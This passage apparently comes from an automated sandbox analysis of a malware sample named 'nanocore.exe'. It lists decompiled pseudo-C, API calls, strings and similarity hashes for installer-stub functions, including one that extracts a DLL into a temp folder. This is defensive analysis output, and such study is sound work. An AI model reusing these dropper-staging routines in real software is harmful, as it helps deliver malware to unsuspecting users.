            • Opcode Fuzzy Hash: c314478f6f4e40384318fc6190c3d30b27ba08e08edfb8903b1c4efaf63681d6
            • Instruction Fuzzy Hash: 2421F731540A11ABEB209BF08D6FB9B7B78EB0AF50F205261E674972C4DB749509CA62
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00405C94(CHAR* _a4) {
            				void* _t3;
            				void* _t8;
            
            				SetErrorMode(0x8001); // executed
            				_t3 = FindFirstFileA(_a4, 0x7a15d0); // executed
            				_t8 = _t3; // executed
            				SetErrorMode(0); // executed
            				if(_t8 == 0xffffffff) {
            					return 0;
            				}
            				FindClose(_t8); // executed
            				return 0x7a15d0;
            			}

            APIs
            • SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,C:\Users\user\Desktop\nanocore.exe 0), ref: 00405CA2
            • FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
            • SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
            • FindClose.KERNELBASE(00000000), ref: 00405CC0
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C94
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: ErrorFindMode$CloseFileFirst
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 2885216544-3081826266
            • Opcode ID: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
            • Instruction ID: 58bb4516a74dc5dde44cdc206f1ac441c4a30f5218be24d725a78a1f01f55fab
            • Opcode Fuzzy Hash: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
            • Instruction Fuzzy Hash: 6AE08632B1971057D20057B45D88D0B3AA8D7C5721F100132F211B73D0D5755C114BE5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 89%
            			E00403526() {
            				intOrPtr _v4;
            				intOrPtr _v8;
            				int _v12;
            				int _v16;
            				char _v20;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				intOrPtr* _t20;
            				void* _t28;
            				void* _t30;
            				int _t31;
            				void* _t34;
            				struct HINSTANCE__* _t37;
            				int _t38;
            				int _t42;
            				char _t61;
            				CHAR* _t63;
            				signed char _t67;
            				signed short _t71;
            				CHAR* _t78;
            				intOrPtr _t80;
            				CHAR* _t82;
            				CHAR* _t84;
            				CHAR* _t85;
            
            				_t80 =  *0x7a2f88;
            				_t20 = E00405CD2("KERNEL32.dll", "GetUserDefaultUILanguage");
            				_t88 = _t20;
            				if(_t20 == 0) {
            					_t78 = 0x79f580;
            					"1033" = 0x7830;
            					E004058B3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f580);
            					__eflags =  *0x79f580;
            					if(__eflags == 0) {
            						E004058B3(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x79f580);
            					}
            					lstrcatA("1033", _t78);
            				} else {
            					_t71 =  *_t20(); // executed
            					E0040591D("1033", _t71 & 0x0000ffff);
            				}
            				E004037F2(_t75, _t88);
            				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
            				 *0x7a3000 =  *0x7a2f90 & 0x00000020;
            				if(E004055AC(_t88, _t84) != 0) {
            					L16:
            					if(E004055AC(_t96, _t84) == 0) {
            						_push( *((intOrPtr*)(_t80 + 0x118)));
            						_push(_t84);
            						E004059E1(0, _t78, _t80);
            					}
            					_t28 = LoadImageA( *0x7a2f80, 0x67, 1, 0, 0, 0x8040); // executed
            					 *0x7a2768 = _t28;
            					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
            						L21:
            						if(E00401410(0) == 0) {
            							_t30 = E004037F2(_t75, __eflags);
            							__eflags =  *0x7a3020;
            							if( *0x7a3020 != 0) {
            								_t31 = E00404E34(_t30, 0);
            								__eflags = _t31;
            								if(_t31 == 0) {
            									E00401410(1);
            									goto L33;
            								}
            								__eflags =  *0x7a274c;
            								if( *0x7a274c == 0) {
            									E00401410(2);
            								}
            								goto L22;
            							}
            							ShowWindow( *0x79f560, 5);
            							_t85 = "RichEd20.dll";
            							_t37 = LoadLibraryA(_t85);
            							__eflags = _t37;
            							if(_t37 == 0) {
            								M004092B6 = 0x3233;
            								LoadLibraryA(_t85);
            							}
            							_t82 = "RichEdit20A";
            							_t38 = GetClassInfoA(0, _t82, 0x7a2720);
            							__eflags = _t38;
            							if(_t38 == 0) {
            								 *0x4092ac = 0;
            								GetClassInfoA(0, _t82, 0x7a2720);
            								 *0x7a2744 = _t82;
            								 *0x4092ac = 0x32;
            								RegisterClassA(0x7a2720);
            							}
            							_t42 = DialogBoxParamA( *0x7a2f80,  *0x7a2760 + 0x00000069 & 0x0000ffff, 0, E004038BF, 0);
            							E00401410(5);
            							return _t42;
            						}
            						L22:
            						_t34 = 2;
            						return _t34;
            					} else {
            						_t75 =  *0x7a2f80;
            						 *0x7a2734 = _t28;
            						_v20 = 0x624e5f;
            						 *0x7a2724 = E00401000;
            						 *0x7a2730 =  *0x7a2f80;
            						 *0x7a2744 =  &_v20;
            						if(RegisterClassA(0x7a2720) == 0) {
            							L33:
            							__eflags = 0;
            							return 0;
            						}
            						_t12 =  &_v16; // 0x624e5f
            						SystemParametersInfoA(0x30, 0, _t12, 0);
            						 *0x79f560 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f80, 0);
            						goto L21;
            					}
            				} else {
            					_t75 =  *(_t80 + 0x48);
            					if(_t75 == 0) {
            						goto L16;
            					}
            					_t78 = 0x7a1f20;
            					E004058B3( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x7a2fb8, 0x7a1f20);
            					_t61 =  *0x7a1f20; // 0x49
            					if(_t61 == 0) {
            						goto L16;
            					}
            					if(_t61 == 0x22) {
            						_t78 = 0x7a1f21;
            						 *((char*)(E004054F7(0x7a1f21, 0x22))) = 0;
            					}
            					_t63 = lstrlenA(_t78) + _t78 - 4;
            					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
            						L15:
            						E004059BF(_t84, E004054CC(_t78));
            						goto L16;
            					} else {
            						_t67 = GetFileAttributesA(_t78);
            						if(_t67 == 0xffffffff) {
            							L14:
            							E00405513(_t78);
            							goto L15;
            						}
            						_t96 = _t67 & 0x00000010;
            						if((_t67 & 0x00000010) != 0) {
            							goto L15;
            						}
            						goto L14;
            					}
            				}
            			}

            APIs
              • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
              • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
              • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
            • GetUserDefaultUILanguage.KERNELBASE(KERNEL32.dll,GetUserDefaultUILanguage,C:\Users\user\Desktop\nanocore.exe 0,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 00403548
              • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
            • lstrcatA.KERNEL32(1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,C:\Users\user\Desktop\nanocore.exe 0,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 0040359D
            • lstrlenA.KERNEL32(007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 00403607
            • lstrcmpiA.KERNEL32(?,.exe,007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage), ref: 0040361A
            • GetFileAttributesA.KERNEL32(007A1F20), ref: 00403625
            • LoadImageA.USER32 ref: 0040366E
            • RegisterClassA.USER32 ref: 004036B5
            • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036CD
            • CreateWindowExA.USER32 ref: 00403706
            • ShowWindow.USER32(00000005,00000000), ref: 0040373C
            • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040374E
            • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040375E
            • GetClassInfoA.USER32 ref: 0040376E
            • GetClassInfoA.USER32 ref: 0040377D
            • RegisterClassA.USER32 ref: 0040378D
            • DialogBoxParamA.USER32 ref: 004037AC
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
            • String ID: 'z$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\nanocore.exe 0$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
            • API String ID: 2262724009-3034644473
            • Opcode ID: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
            • Instruction ID: 4e9c7f181e94f196de7c88ece58cce9fa533c44585b571451200f5668265d8f3
            • Opcode Fuzzy Hash: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
            • Instruction Fuzzy Hash: 5361C2B1504240BFE720AF699D45E2B3AACEB85759B00457FF941B22E2D73D9D018B2E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 81%
            			E00402C37(void* __eflags, signed int _a4) {
            				struct HWND__* _v8;
            				long _v12;
            				long _v16;
            				void* _v20;
            				intOrPtr _v24;
            				long _v28;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				intOrPtr _v40;
            				intOrPtr _v44;
            				signed int _v48;
            				long _t52;
            				signed int _t56;
            				void* _t62;
            				intOrPtr* _t66;
            				long _t67;
            				signed int _t73;
            				signed int _t78;
            				signed int _t79;
            				long _t84;
            				intOrPtr _t89;
            				void* _t91;
            				signed int _t92;
            				signed int _t93;
            				signed int _t94;
            				signed int _t95;
            				void* _t97;
            				signed int _t101;
            				void* _t102;
            
            				_v8 = 0;
            				_t52 = GetTickCount();
            				_v16 = 0;
            				_v12 = 0;
            				_t100 = "C:\\Users\\jones\\Desktop";
            				_t97 = _t52 + 0x3e8;
            				GetModuleFileNameA( *0x7a2f80, "C:\\Users\\jones\\Desktop", 0x400);
            				_t91 = E00405690(_t100, 0x80000000, 3);
            				_v20 = _t91;
            				 *0x409020 = _t91;
            				if(_t91 == 0xffffffff) {
            					return "Error launching installer";
            				}
            				E00405513(_t100);
            				_t56 = GetFileSize(_t91, 0);
            				__eflags = _t56;
            				 *0x79d938 = _t56;
            				_t101 = _t56;
            				if(_t56 <= 0) {
            					L27:
            					__eflags =  *0x7a2f8c;
            					if( *0x7a2f8c == 0) {
            						goto L33;
            					}
            					__eflags = _v12;
            					if(_v12 == 0) {
            						L31:
            						_t102 = GlobalAlloc(0x40, _v28);
            						E004030FF( *0x7a2f8c + 0x1c);
            						_push(_v28);
            						_push(_t102);
            						_push(0);
            						_push(0xffffffff);
            						_t62 = E00402EBD();
            						__eflags = _t62 - _v28;
            						if(_t62 == _v28) {
            							__eflags = _a4 & 0x00000002;
            							 *0x7a2f88 = _t102;
            							if((_a4 & 0x00000002) != 0) {
            								 *_t102 =  *_t102 | 0x00000008;
            								__eflags =  *_t102;
            							}
            							__eflags = _v48 & 0x00000001;
            							 *0x7a3020 =  *_t102 & 0x00000018;
            							 *0x7a2f90 =  *_t102;
            							if((_v48 & 0x00000001) != 0) {
            								 *0x7a2f94 =  *0x7a2f94 + 1;
            								__eflags =  *0x7a2f94;
            							}
            							_t49 = _t102 + 0x44; // 0x44
            							_t66 = _t49;
            							_t93 = 8;
            							do {
            								_t66 = _t66 - 8;
            								 *_t66 =  *_t66 + _t102;
            								_t93 = _t93 - 1;
            								__eflags = _t93;
            							} while (_t93 != 0);
            							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
            							 *(_t102 + 0x3c) = _t67;
            							E00405670(0x7a2fa0, _t102 + 4, 0x40);
            							__eflags = 0;
            							return 0;
            						}
            						GlobalFree(_t102);
            						goto L33;
            					}
            					E004030FF( *0x789930);
            					_t73 = E004030CD( &_v12, 4); // executed
            					__eflags = _t73;
            					if(_t73 == 0) {
            						goto L33;
            					}
            					__eflags = _v16 - _v12;
            					if(_v16 != _v12) {
            						goto L33;
            					}
            					goto L31;
            				} else {
            					do {
            						_t92 = _t101;
            						asm("sbb eax, eax");
            						_t78 = ( ~( *0x7a2f8c) & 0x00007e00) + 0x200;
            						__eflags = _t101 - _t78;
            						if(_t101 >= _t78) {
            							_t92 = _t78;
            						}
            						_t79 = E004030CD(0x795938, _t92); // executed
            						__eflags = _t79;
            						if(_t79 == 0) {
            							__eflags = _v8;
            							if(_v8 != 0) {
            								DestroyWindow(_v8);
            							}
            							L33:
            							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
            						}
            						__eflags =  *0x7a2f8c;
            						if( *0x7a2f8c != 0) {
            							__eflags = _a4 & 0x00000002;
            							if((_a4 & 0x00000002) == 0) {
            								__eflags = _v8;
            								if(_v8 == 0) {
            									_t84 = GetTickCount();
            									__eflags = _t84 - _t97;
            									if(_t84 > _t97) {
            										_v8 = CreateDialogParamA( *0x7a2f80, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
            									}
            								} else {
            									E00405CFC(0);
            								}
            							}
            							goto L22;
            						}
            						E00405670( &_v48, 0x795938, 0x1c);
            						_t94 = _v48;
            						__eflags = _t94 & 0xfffffff0;
            						if((_t94 & 0xfffffff0) != 0) {
            							goto L22;
            						}
            						__eflags = _v44 - 0xdeadbeef;
            						if(_v44 != 0xdeadbeef) {
            							goto L22;
            						}
            						__eflags = _v32 - 0x74736e49;
            						if(_v32 != 0x74736e49) {
            							goto L22;
            						}
            						__eflags = _v36 - 0x74666f73;
            						if(_v36 != 0x74666f73) {
            							goto L22;
            						}
            						__eflags = _v40 - 0x6c6c754e;
            						if(_v40 != 0x6c6c754e) {
            							goto L22;
            						}
            						_t89 = _v24;
            						__eflags = _t89 - _t101;
            						if(_t89 > _t101) {
            							goto L33;
            						}
            						_a4 = _a4 | _t94;
            						_t95 =  *0x789930; // 0x4e6c2
            						__eflags = _a4 & 0x00000008;
            						 *0x7a2f8c = _t95;
            						if((_a4 & 0x00000008) != 0) {
            							L15:
            							_v12 = _v12 + 1;
            							_t24 = _t89 - 4; // 0x1c
            							_t101 = _t24;
            							__eflags = _t92 - _t101;
            							if(_t92 > _t101) {
            								_t92 = _t101;
            							}
            							goto L22;
            						}
            						__eflags = _a4 & 0x00000004;
            						if((_a4 & 0x00000004) != 0) {
            							break;
            						}
            						goto L15;
            						L22:
            						__eflags = _t101 -  *0x79d938; // 0x4e6c6
            						if(__eflags < 0) {
            							_v16 = E00405D2F(_v16, 0x795938, _t92);
            						}
            						 *0x789930 =  *0x789930 + _t92;
            						_t101 = _t101 - _t92;
            						__eflags = _t101;
            					} while (_t101 > 0);
            					__eflags = _v8;
            					if(_v8 != 0) {
            						DestroyWindow(_v8);
            					}
            					goto L27;
            				}
            			}

            APIs
            • GetTickCount.KERNEL32 ref: 00402C45
            • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A
              • Part of subcall function 00405690: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
              • Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
            • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402CA0
            • DestroyWindow.USER32(00000000,00795938,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402DD8
            • GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14
            Strings
            • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
            • soft, xrefs: 00402D26
            • verifying installer: %d%%, xrefs: 00402D89
            • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
            • C:\Users\user\Desktop\nanocore.exe 0, xrefs: 00402C41
            • Inst, xrefs: 00402D19
            • Error launching installer, xrefs: 00402C8D
            • Null, xrefs: 00402D2F
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\nanocore.exe 0$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
            • API String ID: 2181728824-2869486257
            • Opcode ID: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
            • Instruction ID: 2bc3342fd27a022da09e110317cf5b670322b105189d6b48e3606e9cef6b214d
            • Opcode Fuzzy Hash: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
            • Instruction Fuzzy Hash: 8561CE30900215EBDB219F64DE49B9EBBB4BF45714F20813AF900B22E2D7BC9D418B9C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 57%
            			E0040179D(FILETIME* __ebx, void* __eflags) {
            				void* _t33;
            				void* _t41;
            				void* _t43;
            				long _t49;
            				long _t62;
            				signed char _t63;
            				long _t64;
            				void* _t66;
            				long _t72;
            				FILETIME* _t73;
            				FILETIME* _t77;
            				signed int _t79;
            				void* _t82;
            				CHAR* _t84;
            				void* _t87;
            
            				_t77 = __ebx;
            				_t84 = E00402A9A(0x31);
            				 *(_t87 - 0x34) = _t84;
            				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
            				_t33 = E00405538(_t84);
            				_push(_t84);
            				if(_t33 == 0) {
            					lstrcatA(E004054CC(E004059BF(0x409c18, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
            				} else {
            					_push(0x409c18);
            					E004059BF();
            				}
            				E00405BFB(0x409c18);
            				while(1) {
            					__eflags =  *(_t87 + 8) - 3;
            					if( *(_t87 + 8) >= 3) {
            						_t66 = E00405C94(0x409c18);
            						_t79 = 0;
            						__eflags = _t66 - _t77;
            						if(_t66 != _t77) {
            							_t73 = _t66 + 0x14;
            							__eflags = _t73;
            							_t79 = CompareFileTime(_t73, _t87 - 0x18);
            						}
            						asm("sbb eax, eax");
            						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
            						__eflags = _t72;
            						 *(_t87 + 8) = _t72;
            					}
            					__eflags =  *(_t87 + 8) - _t77;
            					if( *(_t87 + 8) == _t77) {
            						_t63 = GetFileAttributesA(0x409c18); // executed
            						_t64 = _t63 & 0x000000fe;
            						__eflags = _t64;
            						SetFileAttributesA(0x409c18, _t64); // executed
            					}
            					__eflags =  *(_t87 + 8) - 1;
            					_t41 = E00405690(0x409c18, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
            					__eflags = _t41 - 0xffffffff;
            					 *(_t87 - 8) = _t41;
            					if(_t41 != 0xffffffff) {
            						break;
            					}
            					__eflags =  *(_t87 + 8) - _t77;
            					if( *(_t87 + 8) != _t77) {
            						E00404D62(0xffffffe2,  *(_t87 - 0x34));
            						__eflags =  *(_t87 + 8) - 2;
            						if(__eflags == 0) {
            							 *((intOrPtr*)(_t87 - 4)) = 1;
            						}
            						L31:
            						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t87 - 4));
            						__eflags =  *0x7a3008;
            						goto L32;
            					} else {
            						E004059BF(0x40a418, 0x7a4000);
            						E004059BF(0x7a4000, 0x409c18);
            						E004059E1(_t77, 0x40a418, 0x409c18, "C:\Users\jones\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll",  *((intOrPtr*)(_t87 - 0x10)));
            						E004059BF(0x7a4000, 0x40a418);
            						_t62 = E004052BF("C:\Users\jones\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll",  *(_t87 - 0x24) >> 3) - 4;
            						__eflags = _t62;
            						if(_t62 == 0) {
            							continue;
            						} else {
            							__eflags = _t62 == 1;
            							if(_t62 == 1) {
            								 *0x7a3008 =  *0x7a3008 + 1;
            								L32:
            								_t49 = 0;
            								__eflags = 0;
            							} else {
            								_push(0x409c18);
            								_push(0xfffffffa);
            								E00404D62();
            								L29:
            								_t49 = 0x7fffffff;
            							}
            						}
            					}
            					L33:
            					return _t49;
            				}
            				E00404D62(0xffffffea,  *(_t87 - 0x34));
            				 *0x4092a0 =  *0x4092a0 + 1;
            				_push(_t77);
            				_push(_t77);
            				_push( *(_t87 - 8));
            				_push( *((intOrPtr*)(_t87 - 0x1c)));
            				_t43 = E00402EBD(); // executed
            				 *0x4092a0 =  *0x4092a0 - 1;
            				__eflags =  *(_t87 - 0x18) - 0xffffffff;
            				_t82 = _t43;
            				if( *(_t87 - 0x18) != 0xffffffff) {
            					L22:
            					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
            				} else {
            					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
            					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
            						goto L22;
            					}
            				}
            				FindCloseChangeNotification( *(_t87 - 8)); // executed
            				__eflags = _t82 - _t77;
            				if(_t82 >= _t77) {
            					goto L31;
            				} else {
            					__eflags = _t82 - 0xfffffffe;
            					if(_t82 != 0xfffffffe) {
            						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffee);
            					} else {
            						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffe9);
            						lstrcatA(0x409c18,  *(_t87 - 0x34));
            					}
            					_push(0x200010);
            					_push(0x409c18);
            					E004052BF();
            					goto L29;
            				}
            				goto L33;
            			}

            Instruction address column for E0040179D (per-line alignment lost): 0x0040179d to 0x00401946, plus 0x00401495, 0x004015ca, 0x0040228e, 0x00402293, 0x004026da and 0x0040292f to 0x0040293e

            APIs
            • lstrcatA.KERNEL32(00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
            • CompareFileTime.KERNEL32(-00000014,?,Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
            • GetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
            • SetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,00000000), ref: 00401833
              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll$Ivlfdpdlcleoxmzl
            • API String ID: 1152937526-4262345851
            • Opcode ID: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
            • Instruction ID: f975a3bedda6f2933beab8fd4359c2ae6630d988b8a67772af92d786c35f871c
            • Opcode Fuzzy Hash: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
            • Instruction Fuzzy Hash: 0141E471901504BBDF117FA5CD869AF3AA9EF42328B20423BF512F11E1C73C4A41CAAD
            Uniqueness

            Uniqueness Score: -1.00%

